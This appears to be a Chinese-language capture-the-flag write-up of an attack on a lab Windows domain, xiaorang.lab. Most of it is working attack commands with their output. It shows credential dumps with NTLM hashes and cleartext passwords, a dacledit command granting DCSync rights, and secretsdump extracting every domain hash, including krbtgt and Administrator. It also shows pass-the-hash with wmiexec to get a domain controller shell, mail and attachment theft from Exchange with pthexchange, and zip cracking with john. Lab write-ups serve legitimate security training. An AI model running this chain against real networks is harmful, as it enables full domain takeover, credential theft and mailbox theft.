Authentication Id : 0 ; 103805 (00000000:0001957d)
Session           : Service from 0
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2023/12/12 20:50:16
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/12/12 20:50:14
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 0da54b8de678c4d8b254fce9d1081030
         * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xiaorang-exc01$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 10873250 (00000000:00a5e9a2)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2023/12/12 21:28:40
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
        msv :
         [00000003] Primary
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * NTLM     : a6542906b0dd6b0098cc64ddcf9f9b4a
         * SHA1     : e717653013914d124e01233d60355e2eac01822f
         * DPAPI    : 2f20de3d3c0edb29479c31d3d7f50a4d
        tspkg :
        wdigest :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2602209 (00000000:0027b4e1)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2023/12/12 20:52:36
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
        msv :
         [00000003] Primary
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * NTLM     : 3d415bf5c187ab1ab2406cb5154f886c
         * SHA1     : 7555574ecdc3e26043e2e3613141d01ffed66a3a
         * DPAPI    : f116f79ace23c7e0a37be30044c58568
        tspkg :
        wdigest :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : HealthMailbox0d5918e
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1990324 (00000000:001e5eb4)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/12/12 20:52:14
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 0da54b8de678c4d8b254fce9d1081030
         * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
        tspkg :
        wdigest :
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XIAORANG-EXC01$
         * Domain   : xiaorang.lab
         * Password : 54 3b 31 cd 9a e1 74 c9 43 d1 53 41 ff e9 dd ea 15 be 3a 73 a8 12 8b 4c 82 e0 e8 84 ed 88 0d 13 a4 94 12 d4 b3 29 a3 60 b7 d8 92 cc 7b 67 d3 e5 57 9e be 91 77 b6 8a dc b7 a0 fd b0 e1 4b 87 52 0a c5 41 96 c4 1f 60 df 3d 78 5d 32 72 35 47 ef e0 d3 d3 79 cd 34 07 72 9f 12 9b e1 5a e4 c4 bc c0 aa c9 32 28 26 2d 54 03 ca f7 6b b6 d1 d1 5e 33 b8 03 45 f0 f7 fb cf 8b e3 23 2a eb c0 2e c9 fd 6c cc 50 48 b6 87 bc a3 f5 9a 8e cd b7 29 f2 cf 5b 33 61 92 fd f2 94 02 8e 6f 74 1e 5c ff bd fa 24 d7 c9 3c d6 31 be 2d 05 38 78 d8 f0 a0 39 53 eb b5 8e 38 bc 1b 1b 7b 11 c2 79 e1 fb 56 c7 39 25 f0 6f a9 f9 47 78 59 3e 40 2c e9 15 10 98 35 69 ef b7 5f 1a 9d a0 dc 79 dc 3a fb 6f 0a ae eb dc 25 9b 50 3b cc 4d 24 d8 29 1f eb 49 39 63
        ssp :
        credman :

Authentication Id : 0 ; 103930 (00000000:000195fa)
Session           : Service from 0
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2023/12/12 20:50:16
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
        msv :
         [00000003] Primary
         * Username : Zhangtong
         * Domain   : XIAORANG
         * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
         * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
         * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        tspkg :
        wdigest :
         * Username : Zhangtong
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : Zhangtong
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/12/12 20:50:15
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 22772 (00000000:000058f4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/12/12 20:50:05
SID               :
        msv :
         [00000003] Primary
         * Username : XIAORANG-EXC01$
         * Domain   : XIAORANG
         * NTLM     : 0da54b8de678c4d8b254fce9d1081030
         * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
        tspkg :
        wdigest :
        kerberos :
        ssp :
         [00000000]
         * Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
         * Domain   : (null)
         * Password : t4q3N:BY6LhvM78Sxb@aMvId?TjUV](t!r@p;&[L(^u;em2m-$xs-6A=}mEi2COT}134L19VX*CAas:b!jA@K0w7sFw)kg]JL^P-UV_c7VJ98Uw3e%KX;H_{*3Uw5OWb
         [00000001]
         * Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
         * Domain   : (null)
         * Password : t4q3N:BY6LhvM78Sxb@aMvId?TjUV](t!r@p;&[L(^u;em2m-$xs-6A=}mEi2COT}134L19VX*CAas:b!jA@K0w7sFw)kg]JL^P-UV_c7VJ98Uw3e%KX;H_{*3Uw5OWb
        credman :

[00000003] Primary
        * Username : Zhangtong
        * Domain   : XIAORANG
        * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
        * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
        * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
        
 msv :
        [00000003] Primary
        * Username : XIAORANG-EXC01$
        * Domain   : XIAORANG
        * NTLM     : 0da54b8de678c4d8b254fce9d1081030
        * SHA1     : b250f5f4ef29959e68d1143023cfbfbae5c39f3f
       tspkg :
       wdigest :

EXC01机器账户的哈希4de6c4eeee1f315e1241c4a813e2b3b5和Zhangtong用户的哈希22c7f81993e96ac83ac2f3f1903de8b4。用bloodhound分析一下发现EXC01机器账户默认对域内成员具有writeDacl权限，这个权限允许身份修改指定对象ACL，所以可以给Zhangtong修改个DCSync，然后就可以抓域控哈希了

dacledit【模块找不到直接注释掉】

proxychains4 -f /etc/proxychains4.conf python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :0da54b8de678c4d8b254fce9d1081030 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

proxychains4 -f /etc/proxychains4.conf python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :0da54b8de678c4d8b254fce9d1081030 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

┌──(root㉿kali)-[/home/kali/Desktop/impacket-master2/examples]
└─# python3 dacledit.py 
Traceback (most recent call last):
  File "/home/kali/Desktop/impacket-master2/examples/dacledit.py", line 39, in <module>
    from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
ModuleNotFoundError: No module named 'impacket.msada_guids'

这里一直失败，提示没有对应的模块，暴力删掉注释掉就好了

┌──(root㉿kali)-[/home/kali/Desktop/impacket-master2/examples]
└─# proxychains4 -f /etc/proxychains4.conf python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :0da54b8de678c4d8b254fce9d1081030 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.2:389  ...  OK
[*] DACL backed up to dacledit-20231212-084441.bak
[*] DACL modified successfully!

secretsdump

cd /home/kali/tools/impacket-master/examples
proxychains4 -f /etc/proxychains4.conf secretsdump.py xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

┌──(root㉿kali)-[/home/kali/Desktop/impacket-master2/examples]
└─# proxychains4 -f /etc/proxychains4.conf secretsdump.py xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.2:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.2:135  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.2:49667  ...  OK
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:526799292b99694d79bfe4244efe7f84:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:a6542906b0dd6b0098cc64ddcf9f9b4a:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:b20db93b6b67846db6351be706c14be9:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:0da54b8de678c4d8b254fce9d1081030:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:abb63f10c14a27a33d4a42002308dba3:::
[*] Cleaning up... 
                  

pth拿域控得flag04

proxychains4 -f /etc/proxychains4.conf wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2

┌──(root㉿kali)-[/home/kali/Desktop/impacket-master2/examples]
└─# proxychains4 -f /etc/proxychains4.conf wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.2:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.2:135  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.2:49666  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

type C:\Users\Administrator\flag\flag.txt

C:\Users\Administrator\flag>type flag.txt
____  ___.___   _____   ________ __________    _____    _______    ________ 
\   \/  /|   | /  _  \  \_____  \\______   \  /  _  \   \      \  /  _____/ 
 \     / |   |/  /_\  \  /   |   \|       _/ /  /_\  \  /   |   \/   \  ___ 
 /     \ |   /    |    \/    |    \    |   \/    |    \/    |    \    \_\  \
/___/\  \|___\____|__  /\_______  /____|_  /\____|__  /\____|__  /\______  /
      \_/            \/         \/       \/         \/         \/        \/ 



flag04: flag{7d63af5c-3650-44de-a462-20d09bc892b4}

flag03

pthexchange

cd /home/kali/Desktop/PTH_Exchange-main
proxychains4 -f /etc/proxychains4.conf python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

┌──(root㉿kali)-[/home/kali/Desktop/PTH_Exchange-main]
└─# proxychains4 -f /etc/proxychains4.conf python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
2023-12-12 08:55:58,266 - DEBUG - [Stage 777] Get Mails Stage 1 Finditem ing... 
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.3.9:443  ...  OK
2023-12-12 08:55:58,950 - DEBUG - [Stage 777] Get Mails Stage 2 GetItem ing... 
2023-12-12 08:56:09,826 - DEBUG - [Stage 777] Get Mails Stage 3 Downloaditem ing... 
[+] Item [output/item-0.eml] saved successfully
2023-12-12 08:56:09,830 - DEBUG - [Stage 555] Ready Download Attachmenting... 
2023-12-12 08:56:09,886 - DEBUG - [Stage 555] Determine if there are attachments in the email... 
2023-12-12 08:56:09,886 - DEBUG - [Stage 555] This Mail Has Attachment... 
2023-12-12 08:56:09,886 - DEBUG - [Stage 555] Start Get Attachment Content... 
2023-12-12 08:56:19,398 - DEBUG - [Stage 555] Start Download Attachment... 
[+] Item [output/item-0-secret.zip] saved successfully
2023-12-12 08:56:19,400 - DEBUG - [Stage 777] Get Mails Stage 2 GetItem ing... 
2023-12-12 08:56:19,538 - DEBUG - [Stage 777] Get Mails Stage 3 Downloaditem ing... 
[+] Item [output/item-1.eml] saved successfully
2023-12-12 08:56:19,538 - DEBUG - [Stage 555] Ready Download Attachmenting... 
2023-12-12 08:56:19,582 - DEBUG - [Stage 555] Determine if there are attachments in the email... 
2023-12-12 08:56:19,582 - DEBUG - [Stage 555] This Mail Has Attachment... 
2023-12-12 08:56:19,583 - DEBUG - [Stage 555] Start Get Attachment Content... 
2023-12-12 08:56:19,905 - DEBUG - [Stage 555] Start Download Attachment... 
[+] Item [output/item-1-phone lists.csv] saved successfully

john爆破压缩包

把电话保存到1.txt

zip2john secret.zip > zip.txt
john --wordlist=1.txt zip.txt